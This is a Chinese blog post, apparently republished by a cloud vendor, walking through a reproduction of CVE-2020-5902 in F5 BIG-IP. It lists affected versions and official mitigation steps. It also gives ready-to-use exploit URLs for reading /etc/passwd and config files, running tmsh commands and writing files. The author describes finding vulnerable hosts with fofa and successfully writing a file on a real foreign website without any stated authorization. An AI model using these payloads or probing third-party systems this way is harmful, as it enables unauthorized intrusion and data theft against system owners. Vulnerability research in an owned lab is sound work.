您好,登錄后才能下訂單哦!
如何進行CVE-2020-5902簡單復現,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
2020通報了f5的一個漏洞,想著先弄個環境保存著,說不定后面就用到了。
近日,F5官方發布公告,修復了流量管理用戶界面(TMUI)中存在的一個遠程代碼執行漏洞(CVE-2020-5902)。此漏洞允許未經身份驗證的攻擊者或經過身份驗證的用戶通過BIG-IP管理端口和/或自身IP對TMUI進行網絡訪問,以執行任意系統命令、創建或刪除文件、禁用服務和/或執行任意Java代碼。該漏洞可能對整個系統造成危害。目前監測到網絡上已經有PoC,并且已有利用該漏洞的攻擊行為出現,建議用戶盡快升級進行防護。
F5 BIG-IP 是美國 F5 公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。
參考鏈接:https://support.f5.com/csp/article/K52145254
F5 BIG-IP 15.x 已知易受攻擊版本 15.1.0、15.0.0
F5 BIG-IP 14.x 已知易受攻擊版本 14.1.0-14.1.2
F5 BIG-IP 13.x 已知易受攻擊版本 13.1.0-13.1.3
F5 BIG-IP 12.x 已知易受攻擊版本 12.1.0-12.1.5
F5 BIG-IP 11.x 已知易受攻擊版本 11.6.1-11.6.5
文件讀取: https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf RCE: https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin 寫入文件: https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=123456
因為才公布出來幾天,所以網上還可以搜到許多漏洞版本的網站(其實感覺大多數site后面也不會修補。),這里嘗試搜了一下,發現還挺多,直接用國外的站點嘗試一下(畢竟自己搭環境還是挺麻煩的,但不知道搜到的具有漏洞的網站是不是蜜罐。。。)
用fofa搜一下漏洞版本:
找到一個漂亮國的能正常訪問。測試一下下,發現能成功。
寫入文件:
這里嘗試RCE列出用戶,沒有輸出
獲取shell網上也有文章寫到了,因為是真實網站,就不繼續嘗試了。:https://github.com/jas502n/CVE-2020-5902
自己搭個環境試試,版本為14.1.2,因為現在官網好像已經下不到漏洞版本了,網上隨便找了個別人下載的,但發現web頁面的賬號密碼好像被他改了(默認是admin/admin),不過不影響,也可以直接利用:
嘗試下msf,這里我剛開始使用的離線下載該模塊,然后手動添加到msf,但發現始終載入不了該模塊,最后也沒解決(應該是我的msf版本太低了,識別不到新模塊),這里其實新版本msf里就有該exp,不用手動添加,更新msf即可(這里遇到一個更新后msf無法啟動的問題,后面解決了,之后再總結一下吧)
這里沒有成功。。后面再嘗試下(網上的文章全都一樣,只寫到了有這個模塊,沒有人說成功用exp拿到了shell。)
通用修補建議: 升級到以下版本 BIG-IP 15.x: 15.1.0.4 BIG-IP 14.x: 14.1.2.6 BIG-IP 13.x: 13.1.3.4 BIG-IP 12.x: 12.1.5.2 BIG-IP 11.x: 11.6.5.2 臨時修補建議: 官方建議可以通過以下步驟臨時緩解影響 1) 使用以下命令登錄對應系統 tmsh 2) 編輯 httpd 組件的配置文件 edit /sys httpd all-properties 3) 文件內容如下 include ' <LocationMatch "...;."> Redirect 404 / </LocationMatch> ' 4) 按照如下操作保存文件 按下 ESC 并依次輸入 :wq 5) 執行命令刷新配置文件 save /sys config 6) 重啟 httpd 服務 restart sys service httpd 并禁止外部IP對 TMUI 頁面的訪問
看完上述內容,你們掌握如何進行CVE-2020-5902簡單復現的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。